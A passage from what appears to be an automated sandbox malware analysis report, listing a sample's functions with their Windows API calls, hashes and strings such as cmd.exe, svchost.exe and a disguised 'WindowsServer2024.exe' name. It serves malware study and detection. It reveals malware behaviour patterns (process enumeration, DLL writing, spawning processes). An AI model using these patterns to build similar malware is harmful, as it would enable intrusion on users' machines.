                                                                              • Part of subcall function 007D0010: lstrlenW.KERNEL32(?), ref: 007D0070
                                                                              • Part of subcall function 007D0010: CoTaskMemFree.COMBASE(?), ref: 007D007F
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8AE0
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8AF0
                                                                            • LocalAlloc.KERNEL32(00000040,00030010), ref: 007C8B3B
                                                                            • LocalAlloc.KERNEL32(00000040,00008AD0), ref: 007C8B55
                                                                            • _memmove.LIBCMT ref: 007C8B76
                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 007C8B86
                                                                            • lstrcpyW.KERNEL32(-00010000,00000000), ref: 007C8B99
                                                                            • lstrcpyW.KERNEL32(-00020000,00000000), ref: 007C8BAD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C32
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C3C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C46
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C57
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C61
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C8C98
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8CA2
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8CAC
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8CB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$lstrcpywnsprintf$FolderKnownPathTaskVirtual_memmovelstrlen
                                                                            • String ID:
                                                                            • API String ID: 586337011-0
                                                                            • Opcode ID: 79e1d975350c5547aa3f96e9111398105525d0d54ac0c7192cdad8f633e84996
                                                                            • Instruction ID: 765c419dbcf18d56132978180fe6bbf0c16ac1b178812634b6ab075516b248f4
                                                                            • Opcode Fuzzy Hash: 79e1d975350c5547aa3f96e9111398105525d0d54ac0c7192cdad8f633e84996
                                                                            • Instruction Fuzzy Hash: 947109B5D00208DBDB54DFA4D889FEEBBB5BF88301F14896DE605B7250DB789980CB61
                                                                            Function 007C2250 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 130processmemorysynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C2314
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C2328
                                                                            • _memset.LIBCMT ref: 007C234B
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C239E
                                                                            • __snwprintf.LIBCMT ref: 007C23D1
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 007C2401
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C2415
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C2422
                                                                            • CloseHandle.KERNEL32(?), ref: 007C242F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C243C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C2449
                                                                              • Part of subcall function 007D79F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C2467
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C247D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$CloseHandle_memset$AllocCreateDirectoryObjectProcessSingleSystemWait__snwprintflstrlen
                                                                            • String ID: D
                                                                            • API String ID: 1415010105-2746444292
                                                                            • Opcode ID: 1a3a604bd57834d6b94b21d3da7a611048868d1b6fece3b23c41d72d28100d87
                                                                            • Instruction ID: 3a99d916f5b90d8e7f26964c1d2cc42d85b41e88bf1cd6b66287e762e4ac2c85
                                                                            • Opcode Fuzzy Hash: 1a3a604bd57834d6b94b21d3da7a611048868d1b6fece3b23c41d72d28100d87
                                                                            • Instruction Fuzzy Hash: BE5139B1A012289FEB24DF54DD49FDABB78BB88304F0045DDE209A6281DBB85F84CF55
                                                                            Function 007CBB80 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 73memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007DBC7D), ref: 007CBB8D
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBBA7
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBBC1
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 007CBBDF
                                                                            • GetWindowsDirectoryW.KERNEL32(00000000,00007FFF), ref: 007CBBF2
                                                                            • __snwprintf.LIBCMT ref: 007CBC0E
                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007CBC1E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC2C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC36
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC40
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC51
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC5B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows__snwprintflstrcmpi
                                                                            • String ID: %s\explorer.exe
                                                                            • API String ID: 150365659-2893622748
                                                                            • Opcode ID: 1bc2730156231c136b7fb96f086a86bce623a63ff0a065b1a52db0f5a3755066
                                                                            • Instruction ID: 3a74ed644ddc0e9c05c56b2498eb85bccb282c30296a167ab67ef992d1362bc9
                                                                            • Opcode Fuzzy Hash: 1bc2730156231c136b7fb96f086a86bce623a63ff0a065b1a52db0f5a3755066
                                                                            • Instruction Fuzzy Hash: 7D210175A00209FBDB14ABA4DD4AF6D7B75AF88701F104968F605A6290DF789A40DB20
                                                                            Function 007CBC80 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 73memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007DBCBF), ref: 007CBC8D
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBCA7
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBCC1
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 007CBCDF
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 007CBCF2
                                                                            • __snwprintf.LIBCMT ref: 007CBD0E
                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007CBD1E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD2C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD36
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD40
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD51
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD5B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
                                                                            • String ID: %s\svchost.exe
                                                                            • API String ID: 4247545968-1955667316
                                                                            • Opcode ID: 699ed8014c4f767dcf33a654050b7929c6d08a953e07fc12c3da54ac01208e9d
                                                                            • Instruction ID: 2eb0b15fd7ec64151d5c5a103c428b45572cf29b263282069155ef414569a324
                                                                            • Opcode Fuzzy Hash: 699ed8014c4f767dcf33a654050b7929c6d08a953e07fc12c3da54ac01208e9d
                                                                            • Instruction Fuzzy Hash: 2D210175B40209FBDB149FE4DC4AF6D7B75AF88701F104968F606AA290DB789A40CB10
                                                                            Function 007CBD80 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 73memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007DBD01), ref: 007CBD8D
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBDA7
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBDC1
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 007CBDDF
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 007CBDF2
                                                                            • __snwprintf.LIBCMT ref: 007CBE0E
                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007CBE1E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE2C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE36
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE40
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE51
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE5B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
                                                                            • String ID: %s\cmd.exe
                                                                            • API String ID: 4247545968-923833829
                                                                            • Opcode ID: 544cc6db9f6e7d74e553801148a9a2e640239086b29a669a2101a8fea773530d
                                                                            • Instruction ID: 63feee36bb24d47ee99e6fc45ffa436789be19c77a8b8c3d510cd5f66ac4c772
                                                                            • Opcode Fuzzy Hash: 544cc6db9f6e7d74e553801148a9a2e640239086b29a669a2101a8fea773530d
                                                                            • Instruction Fuzzy Hash: 22211075E00309FBDB10ABF4DC4AFBE7775AF48B01F108568F605A6291DB789A01CB18
                                                                            Function 007D0500 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 404memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 007D0607
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D0C5A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D0C70
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007D0C8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocVirtual
                                                                            • String ID: @$_DllMain@12
                                                                            • API String ID: 631462101-1064695914
                                                                            • Opcode ID: d07cf10936163be229a583f48caa00eb5307fd2af1994d8e2222bdf729682666
                                                                            • Instruction ID: abdb656eeb26b5abeb3e485f7cb111f7b6c5681f9a5ee30a7cbfd8c2ffd241de
                                                                            • Opcode Fuzzy Hash: d07cf10936163be229a583f48caa00eb5307fd2af1994d8e2222bdf729682666
                                                                            • Instruction Fuzzy Hash: 18228A74A05228CBDB25CF18CD94BE9B7B1BF89309F1491DAD509AB351DB35AE81CF80
                                                                            Function 007C2640 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 187stringprocessmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C2694
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C26B2
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007C26DA
                                                                            • lstrcmpiW.KERNEL32(?,-00832F28,00000000,?,?,?,?,?), ref: 007C278C
                                                                            • _memset.LIBCMT ref: 007C27B1
                                                                            • lstrcpyW.KERNEL32(?,-00832F28,?,?,?,?,?,?,?), ref: 007C27CF
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007C2815
                                                                              • Part of subcall function 007C2A80: construct.LIBCPMTD ref: 007C2B09
                                                                            • StrCatW.SHLWAPI(00000000,007F2714), ref: 007C2863
                                                                            • StrCatW.SHLWAPI(00000000,?), ref: 007C2874
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 007C28D6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C28E8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C28F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalProcess32lstrcpy$AllocCloseCreateFirstFreeHandleNextSnapshotToolhelp32_memset_wcsrchrconstructlstrcmpi
                                                                            • String ID: A#v
                                                                            • API String ID: 4081567023-4158731453
                                                                            • Opcode ID: f05a604fa7706ad1ef7fad623879af459267250acbbc175dc21cf62bb45b119c
                                                                            • Instruction ID: 9a841f8d6fced7fc7cae1d087bea972996048fbf7004668edca9161355181659
                                                                            • Opcode Fuzzy Hash: f05a604fa7706ad1ef7fad623879af459267250acbbc175dc21cf62bb45b119c
                                                                            • Instruction Fuzzy Hash: 3C812DB1904218DBDB14DBA4CC89FEEB7B4BF98700F00459DE116B7291EB786A49CF64
                                                                            Function 007C9400 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132filememorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,007C6D26,?,007C6D8A,00000000,00000000,?), ref: 007C9416
                                                                            • _memmove.LIBCMT ref: 007C9435
                                                                            • lstrcpyW.KERNEL32(?,00000000,00000000,00000000), ref: 007C94FF
                                                                            • StrStrIW.SHLWAPI(?,.DLL), ref: 007C9511
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 007C953C
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 007C9569
                                                                            • CloseHandle.KERNEL32(?), ref: 007C9581
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C958B
                                                                            • CloseHandle.KERNEL32(?), ref: 007C959F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C95C9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFileFreeHandle$AllocCreateWrite_memmovelstrcpy
                                                                            • String ID: .DLL
                                                                            • API String ID: 1779380834-899428287
                                                                            • Opcode ID: 18b60baa27d11729542b5dd7b359a62c632de33c7d437dd94b270be729ecc6e2
                                                                            • Instruction ID: e2406fe45d0d947af44cb1848f9209be7ad2d263cb696aea06149c45acbd4b45
                                                                            • Opcode Fuzzy Hash: 18b60baa27d11729542b5dd7b359a62c632de33c7d437dd94b270be729ecc6e2
                                                                            • Instruction Fuzzy Hash: 5E512A75A00208EBCB25CF98DC48FD9B7B5BB8C310F108999F649A7290DBB4DA81DF54
                                                                            Function 007D69F9 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 111threadnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007D6A7A
                                                                            • __snwprintf.LIBCMT ref: 007D6A9F
                                                                              • Part of subcall function 007CA680: _memset.LIBCMT ref: 007CA6BF
                                                                              • Part of subcall function 007CA680: _memset.LIBCMT ref: 007CA70A
                                                                              • Part of subcall function 007CA680: CoInitializeEx.COMBASE(00000000,00000000), ref: 007CA754
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D6AD9
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6B24
                                                                            • CreateThread.KERNEL32(00000000,00000000,007CF100,00000000,00000000,00000000), ref: 007D6B47
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6B64
                                                                            • WSAStartup.WS2_32(00000002,?), ref: 007D6B73
                                                                            • CreateThread.KERNEL32(00000000,00000000,007DB630,00000000,00000000,00000000), ref: 007D6B95
                                                                            • CreateThread.KERNEL32(00000000,00000000,007E1030,00000000,00000000,00000000), ref: 007D6BAF
                                                                              • Part of subcall function 007DC3A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007DC3DB
                                                                              • Part of subcall function 007DC3A0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 007DC3F4
                                                                              • Part of subcall function 007DC3A0: FreeSid.ADVAPI32(?), ref: 007DC409
                                                                            • WSACleanup.WS2_32 ref: 007D6BCA
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$FreeThread_memsetlstrlen$InitializeLocal__snwprintf$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken
                                                                            • String ID: "%s%s"$WindowsServer2024$WindowsServer2024$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 3184904793-50802693
                                                                            • Opcode ID: 4442ab324ad96478cf1f7a688b5574775c017c50181d19dca8fd516bfc8654db
                                                                            • Instruction ID: ef65b553814f57b4904844229be6dbacb53b3653fd1c073bfb689bce3b07175f
                                                                            • Opcode Fuzzy Hash: 4442ab324ad96478cf1f7a688b5574775c017c50181d19dca8fd516bfc8654db
                                                                            • Instruction Fuzzy Hash: 4841A471A40314EBEB209B60DC4BFA53374B795B05F14445AF309BA3D1E6F85984CF56
                                                                            Function 007D3350 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 72memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3364
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3385
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C30,00000000,00000000,00000000), ref: 007D33AC
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D33BA
                                                                            • __snwprintf.LIBCMT ref: 007D33E4
                                                                            • __snwprintf.LIBCMT ref: 007D33FE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D340A
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 007D3414
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 007D3423
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D342D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D3437
                                                                            Strings
                                                                            Memory Dump Source
